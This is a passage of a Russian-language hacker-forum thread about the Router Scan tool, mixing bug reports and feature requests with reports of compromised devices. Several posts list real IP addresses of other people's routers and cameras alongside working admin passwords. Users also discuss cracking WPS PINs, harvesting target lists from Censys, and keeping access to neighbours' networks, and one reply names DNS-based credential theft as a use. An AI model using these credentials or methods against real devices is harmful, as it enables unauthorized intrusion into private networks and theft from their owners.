PDA

Просмотр полной версии : прога Router Scan


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [18] 19 20 21 22 23 24 25 26 27 28 29 30 31

antis17
21.09.2017, 14:40
94.240.220.50:80 admin:slayerlan

94.240.220.115:80 admin:slayerlan

94.240.220.182:80 admin:slayerlan

http://s41.radikal.ru/i091/1709/5d/8aea77c7962b.jpg

Gashek
21.09.2017, 19:45
Ещё 2 точки с пустым PIN: DIR-825AC, MAC: 10:BE:F5:87:53:E1 и ZXNH H118N MAC: 74:B5:7E:17:3E:14, от Ростелеком.


Подтверждаю ZXNH H118N успешно сдался,

DIR-825AC пока не поддаётся, возможно из за не стабильного сигнала.

exzet
21.09.2017, 21:12
binarymaster, не совсем очевидно, что из wps генератора пины автоматом переносятся в брут. Может пункт в меню на кнопке Море сделать?

binarymaster
21.09.2017, 22:02
binarymaster, не совсем очевидно, что из wps генератора пины автоматом переносятся в брут. Может пункт в меню на кнопке Море сделать?



Какой именно пункт?

По-моему всё вполне очевидно, эта интеграция изначально была задумана, чтобы нажимать меньше кнопок, доводя всё до автоматизма. Причём, список пинов переносится, только если генератору была задана целевая (выбранная в target) сеть.

binarymaster
21.09.2017, 23:03
94.240.220.50:80 admin:slayerlan

94.240.220.115:80 admin:slayerlan

94.240.220.182:80 admin:slayerlan

http://s41.radikal.ru/i091/1709/5d/8aea77c7962b.jpg


Пофиксил.

binarymaster
21.09.2017, 23:17
Не парсит данные.

Cisco Linksys WRT54GCv3

86.100.77.18:8080 admin:123456

http://s019.radikal.ru/i637/1709/e6/96bc28b6fa20.jpg


Это была регрессия, спасибо! Поправил.

А всё потому, что почти у каждой модели Linksys веб интерфейс похож лишь внешне, внутренности полностью отличаются (пути страниц, сигнатуры, и т.п.)

Kakoluk
21.09.2017, 23:22
эта интеграция изначально была задумана, чтобы нажимать меньше кнопок, доводя всё до автоматизма.



Поддерживаю. Когда "великолепный робот"("тупой", известный, повторяющийся алгоритм) высвобождает человека для творчества(нового поиска)..

Ни фига плохого в этом нет. Автоматические-рутинные-повторяющиеся операции, удел роботов/машин/инструментов. И пусть так будет вечно.

Думаю, нужно определить кодекс, насколько машины(II) должны за нас думать.

exzet
21.09.2017, 23:27
Какой именно пункт?

По-моему всё вполне очевидно, эта интеграция изначально была задумана, чтобы нажимать меньше кнопок, доводя всё до автоматизма.



Ну не знаю, Generate all wps, например. Ну чтобы лишний раз в генератор не заходить, и по этому пункту будут генерироваться все пины. Как раз автоматизма больше будет.

Или даже пункт с галочкой, чтобы для каждой сети пины брались не из листа, а генерировались автоматом.

binarymaster
21.09.2017, 23:31
Ну не знаю, Generate all wps, например. Ну чтобы лишний раз в генератор не заходить, и по этому пункту будут генерироваться все пины. Как раз автоматизма больше будет.



А, в этом смысле... но тут я сталкиваюсь с тем, что генератора два - встроенный и онлайновый, и дублировать пункты главного меню совсем не хочется, тем более есть горячие клавиши (Ctrl+W / Alt+W).

Соглашусь с тем, что смена фокуса с формы аудита на основную, и выбор сети в таблице, отнимает некоторое время. Думаю, компромиссным вариантом будет обработка этих же горячих клавиш на форме аудита.

exzet
22.09.2017, 01:22
генератора два - встроенный и онлайновый



А если, ну как вариант... Радиокнопки они же несут чисто информативную нагрузку. Вот если их изменить для онлайн и офлайн генератора? Т.е. без окна генератора, а сразу из памяти пины берутся или заносятся в лист, для наглядности.

И еще небольшой реквест. Удобно было бы, если на форме был прогресс бар или в окне статуса показывались проценты. А то так закинешь пачку пинов и не знаешь.

Тут вылез небольшой баг - уровень сигнала в окне аудита не всегда сразу показывает нужный уровень, надо несколько раз аудит попытаться запустить чтобы заработало.

binarymaster
22.09.2017, 15:04
А если, ну как вариант... Радиокнопки они же несут чисто информативную нагрузку. Вот если их изменить для онлайн и офлайн генератора?



Нет, их менять не хочу, пусть так останутся.



Т.е. без окна генератора, а сразу из памяти пины берутся или заносятся в лист, для наглядности.



Это имеет отношение к тому, что я предложил выше.



И еще небольшой реквест. Удобно было бы, если на форме был прогресс бар или в окне статуса показывались проценты. А то так закинешь пачку пинов и не знаешь.



Это можно, скорее будут проценты, как в reaver.



Тут вылез небольшой баг - уровень сигнала в окне аудита не всегда сразу показывает нужный уровень, надо несколько раз аудит попытаться запустить чтобы заработало.



Уровень сигнала обновляется по мере обновления данных в таблице. Если сканирование сетей отключено, значение обновляться не будет (точнее будет, но другим способом, не самым точным).

Sid1990
22.09.2017, 16:07
Traffic Inspector HTTP/FTP/Proxy server (2.0.1.721) (proxy server) - я правильно понимаю меня блокирует провайдер?

binarymaster
22.09.2017, 16:27
Traffic Inspector HTTP/FTP/Proxy server (2.0.1.721) (proxy server) - я правильно понимаю меня блокирует провайдер?



У вас соединение через прокси, либо на уровне провайдера, либо где-то в вашей сети.

Наверняка какой-нибудь "родительский контроль" (сейчас провайдеры с прокси - редкость)

Sid1990
22.09.2017, 16:43
У вас соединение через прокси, либо на уровне провайдера, либо где-то в вашей сети.

Наверняка какой-нибудь "родительский контроль" (сейчас провайдеры с прокси - редкость)


Спасибо!

TOX1C
22.09.2017, 16:53
Genexis HRG1000



На правах оффтопа - у этого роутера очень интересный заводской wpa psk.

Где то, а точнее много где я подобную генерацию уже видел: zte, huawei, tp-link adsl...

Случайно прошивки от него нет в свободном доступе?

binarymaster
22.09.2017, 21:31
На правах оффтопа - у этого роутера очень интересный заводской wpa psk.

Где то, а точнее много где я подобную генерацию уже видел: zte, huawei, tp-link adsl...

Случайно прошивки от него нет в свободном доступе?



Внешне эти DRGOS очень напоминают прошивку OpenWrt XWrt, и пути похожие.

Вот ещё такой же:



Platform Tundra

Product Name Titanium-24

http://86.61.28.88 admin:admin






Попалась тоже такая точка, с любым PIN дальше M2 не идёт.



Возможно надо как-то твикать содержимое пакета M2 - на этом этапе Registrar (в данном случае RS) представляется точке доступа, но конкретных идей пока нет.

binarymaster
22.09.2017, 21:39
Попалась тоже такая точка, с любым PIN дальше M2 не идёт.



А на каком она диапазоне, случаем не 5 ГГц?

antis17
22.09.2017, 21:48
А на каком она диапазоне, случаем не 5 ГГц?



2,4 ГГц. И ещё такое несколько раз было, окно Wireless Audit Companion (не отвечает) и потом исчезает. Помогает RS свернуть в трей и снова открыть. Не знаю с чем связано, программно или с глюками моей системы.

Felis-Sapiens
22.09.2017, 22:04
2,4 ГГц. И ещё такое несколько раз было, окно Wireless Audit Companion (не отвечает) и потом исчезает. Помогает RS свернуть в трей и снова открыть. Не знаю с чем связано, программно или с глюками моей системы.



Обнаружение сетей включено при этом включено? Попробуйте выключить перед началом аудита.

binarymaster
22.09.2017, 22:25
И ещё такое несколько раз было, окно Wireless Audit Companion (не отвечает) и потом исчезает.



Уже отлавливал, это особенность реализации VCL и дочерних окон при зависании основой формы.

Достаточно развернуть / восстановить главное окно. А ещё в Main Menu есть пункт Audit, если он запущен.

Kanuuuk
23.09.2017, 02:13
WAC говорит на все сети:

[-] Failed to start raw packet capture.

Vovan71
23.09.2017, 12:11
WAC говорит на все сети:

[-] Failed to start raw packet capture.



было и у меня такое )

со встроенным вайфай

вставил дангл usb и все заработало

впав в азарт собрал все вайфай адаптеры. примерно половина работает. остальные такая надпись

если это нужно автору - выложу список )

P.S. автору проги мега респект! супер мощный инструмент создан

binarymaster
23.09.2017, 15:06
WAC говорит на все сети:

[-] Failed to start raw packet capture.






впав в азарт собрал все вайфай адаптеры. примерно половина работает. остальные такая надпись

если это нужно автору - выложу список )



Некоторые драйверы адаптеров не поддерживаются WinPcap'ом. Можете попробовать установить Npcap в режиме совместимости с WinPcap, может быть поможет.

Мне пока несовместимые адаптеры не попадались.



Возможно ли реализовать в твоём комбайне - RS,

mdk и что то типа commview for wi-fi ?



Для этого нужен Monitor Mode, в него пока может лишь Npcap, и на ограниченном числе адаптеров. А ещё он пока не умеет делать инъекцию пакетов.

Пока не появятся стабильные API для режима мониторинга, этих фич ждать не стоит.

binarymaster
23.09.2017, 17:50
Platform Tundra

Product Name Titanium-24

http://86.61.28.88 admin:admin






Genexis HRG1000

92.37.5.33:80 admin:admin



Добавил.

exzet
23.09.2017, 22:46
Некоторые драйверы адаптеров не поддерживаются WinPcap'ом. Можете попробовать установить Npcap в режиме совместимости с WinPcap, может быть поможет.



Что-то я упустил этот момент, RS уже WinPcap юзает? С сетью тоже через него работает?

binarymaster
24.09.2017, 14:25
Что-то я упустил этот момент, RS уже WinPcap юзает? С сетью тоже через него работает?



Он использует его только для отправки WPS EAP пакетов.

TOX1C
24.09.2017, 15:18
легко эксплуатируемый эксплойт



Скорее всего уже есть, это общая для всех Micro DSL дыра.

andr83
24.09.2017, 16:29
Заметил такую интересную вещь у нас много ZTE ZXHN H118N на все 100% уверен что они в диапазонах 77.34.0.0-77.35.255.255, 86.102.0.0-86.102.255.255, 82.162.0.0-82.162.255.255, 5.143.0.0-5.143.255.255. Однако ни одного знакомого мак адреса при сканировании RS ни нахожу. Ради интереса узнал IP одного ZTE у знакомого и зашёл через браузер. Роутер спокойно меня пустил. Сканирую всё из сетки ростелекома.

Payer
24.09.2017, 17:22
Ради интереса узнал IP одного ZTE у знакомого и зашёл через браузер. Роутер спокойно меня пустил. Сканирую всё из сетки ростелекома.



Вы не всю правду нам говорите. Вы зашли на этот роутер будучи к нему подключены по wifi или проводу.

Если роутер этот является шлюзом для вас, то он пускает и по LAN и по WAN.

andr83
24.09.2017, 17:27
Зашёл на роутер по проводу через внешний IP то есть через WAN

binarymaster
24.09.2017, 17:31
Зашёл на роутер по проводу через внешний IP то есть через WAN



Попробуйте зайти на него же с другого интернет соединения, желательно с другого провайдера.

andr83
24.09.2017, 17:41
Хорошо попробую завтра после работы зайти с мегафона. Знакомый вырубил роутер. У телекома в нашем регионе динамические IP

За программу Большое человеческое спасибо. Много дырявого барахла у народа оказывается. Сам сижу на микротике.

binarymaster
24.09.2017, 21:53
binarymaster, может лучше mac адреса для генерации pin в текстовой файл вписывать?



Да, тоже об этом думал, наверно будет.

Vangelis
25.09.2017, 02:53
Доброго всем!

Вопрос - почему асусы идут с пустыми полями логин:пароль

http://2.92.213.34:8080/

http://2.92.213.201:8080/

http://2.94.78.104/

http://2.94.78.191/

http://2.94.138.195/

http://2.94.178.99/

http://2.94.253.61/

http://2.94.253.146:8080/

с пустыми полями он не залогинивается, может я что-то не понимаю?

binarymaster
25.09.2017, 09:44
почему асусы идут с пустыми полями логин:пароль



Это магия эксплойтов.

Vangelis
25.09.2017, 16:52
Это магия эксплойтов.



можно развернуть ответ

binarymaster
25.09.2017, 16:58
с пустыми полями он не залогинивается, может я что-то не понимаю?



Потому что пароль не был подобран / получен, логично же.

Покуда колонка авторизации пуста, логиниться смысла нет.

hunter
25.09.2017, 18:36
Не работает проверка формы авторизации для IP камер. Они определяются (Hikvision App-webs IP Camera, Network Surveillance DVR и т. д.), но сообщения о положительном результате нет (при наличии верной пары логин/пароль в файле auth_form.txt и возможности авторизоваться посредством браузера).

Pebenok70
25.09.2017, 22:02
RS нашёл даже, GNSS приемник Leica GRX1200+ Но не определил, GoAhead-Webs. 84.54.249.202:81

Так же попадаются камеры без определения "Unknown", к примеру Tantos, Falcon Eye

Если нужно, могу скинуть IP

Ещё вопрос по TP-LINK TL-WR741-841. Некоторые поддаются, а много нет. От чего зависит?

ugoday
25.09.2017, 23:25
ECI B-FOCuS стали показывать счастлив как слон Я только есть одно но, если ставить диапазон страны не возможно сохранить результаты, и ошибку не запомнил хоть и третью ночь подряд ставил, на скан. Пробовал автоматическое сохранения по времени, может ещё какие настройки покрутить??? Понимаю что много го хочу. Но всё же.

hunt.lsk
26.09.2017, 09:17
Не определил

http://93.171.30.162:8181

admin:admin

TOX1C
26.09.2017, 19:20
уникальное лохматое устройство 2006 года



Устройство не 2006 года, в 2006 году написали микрокод для этого чипсета. Можешь прогуглить эту строчку (EV-2006-07-27).

Сам девайс может быть вполне свеж.

Определить что это, может угадыватель устройств по MAC в 3wifi базе. Если устройств таких нет, ищи вручную по Первым 6 знакам в wigle, потом в wikidevi ищи подходящий из возможных девайс.

Kakoluk
27.09.2017, 11:02
to binarymaster (https://forum.antichat.xyz/members/148032/) Маленькое предложение по интерфейсу.

Нельзя ли выполнять ресет(остановку и сброс) потока автоматически, когда нажимается R ?

Не совсем удобно сперва жать R(2 раза), а потом R для зависших(ещё не умерших по таймауту) потоков(но которые хотелось бы перепроверить). Всё равно когда пользователь запускает рескан, он и знает чего хочет.

Пальцы уже враскоряк стали.

binarymaster
27.09.2017, 14:41
Нельзя ли выполнять ресет(остановку и сброс) потока автоматически, когда нажимается <CTRL>R ?



Могу сделать, но только опционально (и не по умолчанию), поскольку форс-ресет - это большой костыль, который не прибирается за собой.



Не понятно только почему 3 wifi

компаньон предлагает ASUS PIN | 31710312 | 98%, а он не подходит.



Скорее всего какая-нибудь Airocon прошивка, а их много с ASUS PIN на 3WiFi.

Kakoluk
27.09.2017, 15:03
Могу сделать, но только опционально (и не по умолчанию), поскольку форс-ресет - это большой костыль, который не прибирается за собой.



Да, если можно. Нередко выходит, что получить всё с роутера можно только после нескольких попыток. Может он перегружен, завис, или проблема с сетью. А из юношеского максимализма хочеся допытать его. Некоторые экземпляры, только с 8-10 попытки сдавались.

dremmar
27.09.2017, 15:49
Предлагаю на вкладке wireless networks добавить, помимо add gateway to ranges и add LAN to ranges, что-то типа add extended LAN to ranges, т.е. LAN ЗА роутером, локалку провайдера, тогда когда просто LAN ranges это 192.168.Х.Х внутри квартиры.

А то приходится пользоваться сторонним софтом или просто traceroute для определения диапазонов подобной сети.

binarymaster
27.09.2017, 20:45
Предлагаю на вкладке wireless networks добавить, помимо add gateway to ranges и add LAN to ranges, что-то типа add extended LAN to ranges, т.е. LAN ЗА роутером, локалку провайдера, тогда когда просто LAN ranges это 192.168.Х.Х внутри квартиры.

А то приходится пользоваться сторонним софтом или просто traceroute для определения диапазонов подобной сети.



LAN за роутером - на совести сканирующего.

У меня пока нет кроссплатформенного кода для трассировки. Максимум что могу сделать - это предоставить возможность добавления WAN / MAN диапазона из отсканированных роутеров (на Realtime вкладке).

binarymaster
28.09.2017, 14:36
Может дело в этом https://forum.antichat.ru/threads/mts-161-port.455976/. Пробуйте 161 порт)



Не, Sercomm на 80 порту сидят, иногда ещё на 8080. Это ж не QTECH QBR.



Если дело не только в дефотных портах RS (80,1080, 8080), то напишите какие использовали



В личке.

andr83
29.09.2017, 02:46
скинул в личку может поможет

kupers
30.09.2017, 11:43
Подскажите пожалуйста как воспользоватся пустым впс пином?

TOX1C
30.09.2017, 16:12
Новое Подскажите пожалуйста как воспользоватся пустым впс пином?



http://i89.fastpic.ru/big/2017/0930/20/f351da7df27ee7aedf8c82b505f2b220.png

Kakoluk
30.09.2017, 16:19
Стесняюсь спросить. Есть или у кого нибудь на виду программка(или онлайн сервис), которая бы могла сортировать список CIDR и избавлять от дублей?

Развёрнуто. Допустим, имеем вот такое:

109.161.0.0/17

109.161.0.0/19

109.161.0.0/21

109.161.100.0/22

109.161.112.0/21

109.161.120.0/22

109.161.124.0/22

109.161.16.0/20

109.161.32.0/19

109.161.32.0/21

109.161.40.0/21

109.161.49.0/24

109.161.50.0/23

109.161.52.0/22

109.161.56.0/24

109.161.60.0/22

109.161.64.0/18

109.161.64.0/19

109.161.64.0/20

109.161.64.0/21

109.161.72.0/21

109.161.8.0/21

109.161.80.0/20

109.161.96.0/22

Красным естественно дубли. Это только на вскидку, на первый взгляд.

Задница в том, что все базы диапазонов IPs не имеют(может не хотят иметь) подобного сервиса.

to binarymaster (https://forum.antichat.xyz/members/148032/). Такой инструмент был бы не лишним в RS.

binarymaster
30.09.2017, 16:22
Есть или у кого нибудь на виду программка(или онлайн сервис), которая бы могла сортировать список CIDR и избавлять от дублей?

Задница в том, что все базы диапазонов IPs не имеют(может не хотят иметь) подобного сервиса.

to binarymaster. Такой инструмент был бы не лишним в RS.



Взял на заметку.

Dimanp00
30.09.2017, 17:50
Стесняюсь спросить. Есть или у кого нибудь на виду программка(или онлайн сервис), которая бы могла сортировать список CIDR и избавлять от дублей?



https://www.cidrcalculator.com

Вкладка IPV4 - ДиапазонЫ до CIDR, внизу галки на удаление дублей,объединение и сортировка. А так можно сортировать даже обычным Notepad++.

Kakoluk
30.09.2017, 18:19
https://www.cidrcalculator.com

Вкладка IPV4 - ДиапазонЫ до CIDR, внизу галки на удаление дублей,объединение и сортировка. А так можно сортировать даже обычным Notepad++.



Вы не поняли(Кстати, ресурс красивый, до бесполезности). Перекрываемые(шовные) дубли он не удаляет.

Если вопрос колом встал о сортировке, то это я погорячился. Можно дубли без сортировки удалить. Только, это на уровне быстродействия - ПЕНЬ, с глубокими корнями двоичной алгоритмизации.

SiberX
30.09.2017, 19:45
М-да... Прошли былые времена. После получения доступа к стороннему роутеру, максимум через 2 дня доступ прекращается. Меняется не только user & pass, но и bsid =( Из 10 устройств в течении недели сохраняется доступ к 2-3 роутерам.

hunt.lsk
30.09.2017, 19:48
максимум через 2 дня доступ прекращается



что за модель роутера?

Kakoluk
30.09.2017, 19:52
М-да... Прошли былые времена. После получения доступа к стороннему роутеру, максимум через 2 дня доступ прекращается. Меняется не только user & pass, но и bsid =( Из 10 устройств в течении недели сохраняется доступ к 2-3 роутерам.



Единичный случай(пробжённый юзер попался) не повод опускать руки. Первая неудача?

Будут и триумфы.

SiberX
30.09.2017, 19:52
что за модель роутера?



Мой провайдер помешан на TP-Link Archer C20, массово их внедряет везде десятками штук

Kakoluk
30.09.2017, 19:54
Мой провайдер помешан на TP-Link Archer C20, массово их внедряет везде десятками штук



Как раз их и сканирую. Да вы чревовещатель. )))

(Новосибирск?? "Новотелеком" )?

SiberX
30.09.2017, 19:54
Единичный случай(пробжённый юзер попался) не повод опускать руки. Первая неудача?

Будут и триумфы.



Увы не первый, у меня под сотню таких случаев. Собираю свою сеть уже 4 месяца

SiberX
30.09.2017, 19:55
Как раз их и сканирую. Да вы чревовещатель. )))

(Новосибирск??)



Да, Новосибирск)

Kakoluk
30.09.2017, 19:59
Увы не первый, у меня под сотню таких случаев. Собираю свою сеть уже 4 месяца



Тогда почему я 80 из 300 точек заново открываю на каждом диапазоне? Плохо сканируете.

Для поднятия боевого духа: ))

SiberX
30.09.2017, 20:12
Тогда почему я 80 из 300 точек заново открываю на каждом диапазоне? Плохо сканируете.


Дайте угадаю, с дефолтным доступом(admin@admin), верно?) Только очень быстро поменяются данные, как следствие полного ресета с дальнейшим перезапуском с новыми отличными настройками.

P.S. Во всяком случае так у меня и происходит.

TOX1C
30.09.2017, 22:09
максимум через 2 дня доступ прекращается. Меняется не только user & pass, но и bsid


Очевидный динамический ip. Кстати, эти Archer C2 C20 пора переименовать на "раздатчик бесплатного интернета", пикси их разваливает на ура.

SiberX
30.09.2017, 22:11
Очевидный динамический ip. Кстати, эти Archer C2 C20 пора переименовать на "раздатчик бесплатного интернета", пикси их разваливает на ура.



Нет. У Новотелеком белый IP по умолчанию

ugoday
01.10.2017, 15:21
Почините от повторов снимок не получает по другому загрузить сюда фото уж извините.

https://ibb.co/eJaeLb

inkugnito
01.10.2017, 16:48
Нет. У Новотелеком белый IP по умолчанию



"Белый" IP может быть не только статическим, но и динамическим, про это не подумали?

dremmar
01.10.2017, 17:32
Почините от повторов снимок не получает по другому загрузить сюда фото уж извините.

https://ibb.co/eJaeLb


Что-то мне подсказывает, что у тебя 2 и больше портов стоит для сканирования, и RS получает доступ по 2м сразу, отсюда и повтор

ugoday
01.10.2017, 17:36
Что-то мне подсказывает, что у тебя 2 и больше портов стоит для сканирования, и RS получает доступ по 2м сразу, отсюда и повтор



Так точно два. Спасибо что объснил.

dremmar
01.10.2017, 17:45
А вообще у меня есть предложение!

Не знаю, насколько трудно будет запихнуть это в RS, но тема однозначно стоящая.

Есть сайтик censys.io , аналог Shodan, но бесплатный.

База у него тоже внушительная, например, по запросу "Dir-300" выводит 15 миллионов ip.

Но экспортировать все результаты поиска просто так нельзя.

Варианта 2: скачать базу целиком (1 ТБ в формате json) или же написать разработчикам, чтобы открыли доступ для SQL запросов.

Применительно к RS, думаю, был бы полезен второй вариант, чтобы прямо из RS можно было получить список ip для сканирования.

Можно было бы вшить один аккаунт censys-а в RS ,чтобы пользоваться доступом могли все.

Хотя всё это не более, чем пожелание)

И пара ссылок:

api кенсиса

https://censys.io/api/v1/docs/export

питоновские библиотеки для него же

https://github.com/censys/censys-python

P.S. Я как-то криво выразился. Доступ по sql открывается для каждого аккаунта в индивидуальном порядке, а не то , что его вообще нет ещё.

TOX1C
01.10.2017, 17:54
Наверняка из этих 15 млн 95% это дубли одного и того же на разных адресах и килограммы устаревших данных.

dremmar
01.10.2017, 18:04
Наверняка из этих 15 млн 95% это дубли одного и того же на разных адресах и килограммы устаревших данных.



Тебе-то лучше знать, токсичный_человек.

А база обновляется постоянно, последнее обновление- вчера. И в первых нескольких тысячах роутеров, которые через обычный api удалось выудить (там адовое ограничение на количество запросов, потому лучше бы и организовать по sql) повторов не было.

LolipopR
02.10.2017, 17:56
Я понимаю, форум хакеров, и пароль на скачивания+архив должен каждый сам для себя, если пароли никто не скажет, то можно инструкцию, подсказку как и чем все это пройти.

DSL2650NRU
02.10.2017, 19:16
Я понимаю, форум хакеров, и пароль на скачивания+архив должен каждый сам для себя, если пароли никто не скажет, то можно инструкцию, подсказку как и чем все это пройти.



В правом верхнем углу страницы

binarymaster
02.10.2017, 20:25
Я понимаю, форум хакеров, и пароль на скачивания+архив должен каждый сам для себя, если пароли никто не скажет, то можно инструкцию, подсказку как и чем все это пройти.



У нас соблюдается одно золотое правило - пароль зависит от того, на каком сайте выложено.

В данном случае он у вас на аватаре.

Payer
02.10.2017, 20:32
В данном случае он у вас на аватаре.



Это сложно.

Опять эта проклятая неизвестность....

DSL2650NRU
02.10.2017, 21:40
Я понимаю, форум хакеров, и пароль на скачивания+архив должен каждый сам для себя, если пароли никто не скажет, то можно инструкцию, подсказку как и чем все это пройти.



Каких еще таких хакеров? Вы бы еще написали - "русских хакеров". А то их все ищут...

juandiegomu
02.10.2017, 22:08
Привет друзья, я много читаю Ace. Я не знаю, знаете ли вы, что в wifi-free у них есть PIN-код по умолчанию для Livebox Arcadyan (Orange-XXXX, я говорю это, если вы хотите увеличить его до сканирования маршрутизатора, я пишу вам переводчиком, мои извинения если вы не понимаете, приветствие от Испании

binarymaster
03.10.2017, 00:00
Привет друзья, я много читаю Ace. Я не знаю, знаете ли вы, что в wifi-free у них есть PIN-код по умолчанию для Livebox Arcadyan (Orange-XXXX, я говорю это, если вы хотите увеличить его до сканирования маршрутизатора, я пишу вам переводчиком, мои извинения если вы не понимаете, приветствие от Испании



Транслит понять было трудно, а сейчас вроде понял.

Чтобы добавить роутер Livebox Arcadyan в поддержку, нужны образцы веб интерфейса, желательно в виде IP-адресов с портами, чтобы можно было зайти в панель администрирования роутера.

ugoday
03.10.2017, 06:55
Пароль, На трубе сидел король, Я и там так оставил

juandiegomu
03.10.2017, 11:49
доброе утро Binarymaster в Waircut V1.4 уже реализован Wi-Fi атаки, если вы или коллега хочет попробовать, дает булавку WPS и пароль оранжевый в секундах, приветствие

LolipopR
03.10.2017, 13:52
В правом верхнем углу страницы



Ясно, видимо когда я первый раз его вводил у меня(соседа) откючился интернет, и я посчитал его не правильным.

Такой ещё вопрос, когда я запускаю сканирование по айпи диапазону, то интернет сразу пропадает. (Интернет мобильный, 3G с роутера).

binarymaster
03.10.2017, 14:10
доброе утро Binarymaster в Waircut V1.4 уже реализован Wi-Fi атаки, если вы или коллега хочет попробовать, дает булавку WPS и пароль оранжевый в секундах, приветствие



Спасибо, мы уже знаем по Waircut, ведь есть тема на форуме:

https://forum.antichat.ru/threads/wireless-air-cut.449147/page-10#post-4116562



Такой ещё вопрос, когда я запускаю сканирование по айпи диапазону, то интернет сразу пропадает. (Интернет мобильный, 3G с роутера).



Пробуйте уменьшать потоки сканирования.

DSL2650NRU
03.10.2017, 20:58
Ясно, видимо когда я первый раз его вводил у меня(соседа) откючился интернет, и я посчитал его не правильным.

Такой ещё вопрос, когда я запускаю сканирование по айпи диапазону, то интернет сразу пропадает. (Интернет мобильный, 3G с роутера).



Такая же шляпа мной замечена при сканировании через роутеры TP-Link. Через D-Link все нормально. Либо роутер зависает от такого потока запросов, либо провайдер. Пробуйте уменьшить количество потоков.

juandiegomu
03.10.2017, 21:44
ОК, я не знал, что этот вопрос Waircut форума, приветствия

Pebenok70
04.10.2017, 00:48
79.151.209.169:80 adminassword NETGEAR EX2700 Не кажет RS имя сети, только Key

RAMAZZAN
04.10.2017, 01:06
Для каких целей можно использовать эти роутеры?

Помимо прокси сервера или vpn.

TOX1C
04.10.2017, 02:30
Пользоваться чьим-то интернеиом бесплатно, собирать базы паролей для создания более качественной "генерки" словарей, анализ заводских wpa ключей и кодов wps, для последующего взлома алгоритма и написания генератора.

Ну и паскудство типа воровства учетных данных пользователей подменой dns (делайте так почаще, чтобы роутерсканом вообще ничего не находилось; некоторые производители уже ставят на заводе уникальный пароль на веб интерфейс), пролезание в чужие сети и заражение все внутри, ну и прокси и впн.

Pebenok70
04.10.2017, 11:24
Пользоваться чьим-то интернеиом бесплатно, собирать базы паролей для создания более качественной "генерки" словарей, анализ заводских wpa ключей и кодов wps, для последующего взлома алгоритма и написания генератора.

Ну и паскудство типа воровства учетных данных пользователей подменой dns (делайте так почаще, чтобы роутерсканом вообще ничего не находилось; некоторые производители уже ставят на заводе уникальный пароль на веб интерфейс), пролезание в чужие сети и заражение все внутри, ну и прокси и впн.



Для тех, кто не понял. Во второй части ответа описано то, чего делать не надо. Будьте благоразумными!

dremmar
04.10.2017, 20:54
Для тех, кто не понял. Во второй части ответа описано то, чего делать не надо. Будьте благоразумными!



>ну и прокси и впн

а что в этом такого ужасного?)

Tudiblad
05.10.2017, 17:30
Скажите а эти алгоритмы уже есть в RS?

Полное раскрытие PIN-кода по умолчанию для Livebox Arcadyan (Orange-XXXX)

https://www.wifi-libre.com/topic-869-todo-sobre-al-algoritmo-wps-livebox-arcadyan-orange-xxxx.html

CRACK211
05.10.2017, 18:09
А тут пишут о пустом пине) спасибо бинаримастер за это)можно посмотреть у кого на каких роутерах сработало )

https://www.wifi-libre.com/topic-835-todo-sobre-la-brecha-pin-null-contra-pa-zte-de-jazztel.html

binarymaster
05.10.2017, 22:02
Скажите а эти алгоритмы уже есть в RS?

Полное раскрытие PIN-кода по умолчанию для Livebox Arcadyan (Orange-XXXX)

https://www.wifi-libre.com/topic-869-todo-sobre-al-algoritmo-wps-livebox-arcadyan-orange-xxxx.html



В RS есть лишь алгоритм для Vodafone.

Для реализации этого алгоритма придётся серийник подцеплять в генератор.

http://www.wifi-libre.com/img/members/189/LiveBox-WPS-Pin-Calculator.png

Tudiblad
05.10.2017, 22:29
Для реализации этого алгоритма придётся серийник подцеплять в генератор.



А это реально?

И второй вопрос, там по моему три алгоритма. Livebox, Arcadyan и orange-XXXX или я что то не понял?

CRACK211
05.10.2017, 22:56
А не кто не пробовал к тр-линкам так же подбирать пин? Ну то есть использовать серийный номер при генерации wps pin.

binarymaster
06.10.2017, 00:15
А не кто не пробовал к тр-линкам так же подбирать пин? Ну то есть использовать серийный номер при генерации wps pin.



Не помню, чтобы тп-линки светили свой реальный серийник в WPS заголовках.



А это реально?

И второй вопрос, там по моему три алгоритма. Livebox, Arcadyan и orange-XXXX или я что то не понял?



Я пока досконально не разбирался (сейчас переключился на другой проект), но взял на заметку.

CRACK211
06.10.2017, 14:24
Не парсит.

195.250.74.2:80

195.250.77.50:80

admin:admin

Device Model AN5506-04-B5

Device Description GPON

195.250.84.100:80

admin:admin

парсит только essid и все.

LolipopR
06.10.2017, 18:32
С одного айпи диапазона получить всего 20 результатов из них 2 хороших - это норма?

binarymaster
06.10.2017, 18:48
А толку от серийника, вот вам к примеру Mikrotik

Device Model: Mikrotik RB2011UiAS-2HnD

Serial Number: 703A064839E0

Дайте wps..........



Mikrotik по WPS не вскрываются, уже обсуждалось в одной из соседних тем, требуется нажатие виртуальной кнопки в веб интерфейсе.



С одного айпи диапазона получить всего 20 результатов из них 2 хороших - это норма?



Зависит от принимающей и передающей сторон. Иногда норма.

TOX1C
06.10.2017, 19:00
Ну то есть использовать серийный номер при генерации wps pin



Только непонятно, используется он вообще при генерации. На флешке он не записан, от того и не светится в пакетах. Хотя их серийники можно с большой точностью предугадывать, если есть данные хоть по одному роутеру из всего их диапазона.

inkugnito
06.10.2017, 19:25
Зависит от принимающей и передающей сторон. Иногда норма.



Зависит ещё и от провайдера, у некоторых прямо таки рекомендуют открыть порты 23 и 80 наружуhttp://mosnet.ru/assets/images/wifi/zyxel/pic.sv17.jpg

binarymaster
06.10.2017, 19:31
Вот, висел у меня не до вскрытый Гейфон Серком 6688V2, теперь,

что в RS. что в Dumpper отображается как Device Model: Broadcom.

Шо, делать,

опять мудаки из МГТСа прошивку поменяли очкуя, шо их взломают как и ZTE их "приборы"



Не прошивку поменяли, а устройство. Это другая железка.

Мне такие попадались, пока не удавалось вскрыть, хотя особо не старался - сигнал слабый.

binarymaster
06.10.2017, 19:43
Сорян, ты сам не в МГТС работаешь, если что?) земляк)



Вы уже задавали этот вопрос в личке.



Ни кто в этой квартире "железку" не менял, если чё



Это вряд ли. Серкоммы производят на базе чипов Realtek (пример: https://habrahabr.ru/post/263277/ ).

Broadcom - это другие устройства, в преимуществе с прошивками Micro DSL.

binarymaster
06.10.2017, 19:58
вы вспомнили то, что было много времени назад



"We do not forget." (c) Anonymous

Я ничего не забываю.



Там ни кто не менял "железку" AP висит в сети тот же.



ESSID мог остаться тем же, впрочем я не имею права запрещать верить во что-либо...

LolipopR
06.10.2017, 20:44
Зависит ещё и от провайдера, у некоторых прямо таки рекомендуют открыть порты 23 и 80 наружу


